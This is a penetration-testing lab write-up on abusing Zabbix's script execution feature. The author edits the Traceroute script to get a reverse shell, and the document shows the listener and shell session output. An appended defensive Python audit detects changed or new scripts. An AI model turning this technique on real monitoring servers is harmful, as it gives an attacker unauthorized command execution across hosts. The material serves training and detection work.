Zabbix Script Execution


Compromising administrative access to a Zabbix instance poses a significant security risk, as it grants control over powerful features such as the remote command execution capability. Zabbix allows administrators to configure scripts that can execute arbitrary operating system commands on registered hosts. If an attacker gains such access, they can leverage this functionality to execute malicious code across the monitored infrastructure. This highlights the critical importance of securing Zabbix administrative interfaces and enforcing strict access controls.

Looking into the Scripts feature under the Alerts section, there are 3 default scripts.

I will edit the Traceroute script.

Successfully updated.

Now I just need to execute the updated script by clicking into the host and the updated script; Zabbix Script Exec.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/zab]
└─$ nnc 4444
listening on [any] 4444 ...
connect to [192.168.45.155] from (UNKNOWN) [192.168.239.210] 36174
bash: cannot set terminal process group (33522): Inappropriate ioctl for device
bash: no job control in this shell
zabbix@zab:/$ whoami
whoami
zabbix
zabbix@zab:/$ hostname
hostname
zab
zabbix@zab:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:04:3d brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.239.210/24 brd 192.168.239.255 scope global ens192
       valid_lft forever preferred_lft forever

Lateral movement made to the zabbix user via Zabbix Script Execution.
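
A defensive check for the script change shown above, as an added example that is not part of the original write-up: it compares script definitions in the shape returned by the Zabbix API `script.get` method against a reviewed baseline and reports new, modified, renamed or removed scripts. The sample records, the baseline commands and the function names are constructed assumptions; build the real baseline from a known-good export of your own instance.

```python
import hashlib

# Constructed data in the shape of Zabbix API script.get results
# (fields scriptid, name, command). Commands here are assumptions;
# build the real baseline from a known-good export of your own instance.
KNOWN_GOOD = [
    {"scriptid": "1", "name": "Ping", "command": "ping -c 3 {HOST.CONN}"},
    {"scriptid": "2", "name": "Traceroute", "command": "/usr/bin/traceroute {HOST.CONN}"},
    {"scriptid": "3", "name": "Detect operating system", "command": "sudo /usr/bin/nmap -O {HOST.CONN}"},
]
CURRENT = [
    {"scriptid": "1", "name": "Ping", "command": "ping -c 3 {HOST.CONN}"},
    {"scriptid": "2", "name": "Traceroute", "command": "<CHANGED-COMMAND-PLACEHOLDER>"},
    {"scriptid": "9", "name": "Maintenance", "command": "<UNREVIEWED-COMMAND-PLACEHOLDER>"},
]


def fingerprint(command):
    """SHA-256 of the exact command text; any edit changes the digest."""
    return hashlib.sha256(command.encode("utf-8")).hexdigest()


def build_baseline(scripts):
    """Map scriptid -> (name, digest) from a reviewed script list."""
    return {s["scriptid"]: (s["name"], fingerprint(s["command"])) for s in scripts}


def audit(scripts, baseline):
    """Return sorted (finding, scriptid, name) tuples for every deviation."""
    findings, seen = [], set()
    for s in scripts:
        sid = s["scriptid"]
        seen.add(sid)
        if sid not in baseline:
            findings.append(("new", sid, s["name"]))
        elif fingerprint(s["command"]) != baseline[sid][1]:
            findings.append(("modified", sid, s["name"]))
        elif s["name"] != baseline[sid][0]:
            findings.append(("renamed", sid, s["name"]))
    for sid in baseline.keys() - seen:
        findings.append(("removed", sid, baseline[sid][0]))
    return sorted(findings)


if __name__ == "__main__":
    for finding, sid, name in audit(CURRENT, build_baseline(KNOWN_GOOD)):
        print(f"{finding:9} scriptid={sid} name={name}")
```

Run on a schedule against the live script list, any "modified" or "new" finding that does not match an approved change is worth an alert, since a script keeps its familiar name after its command is edited.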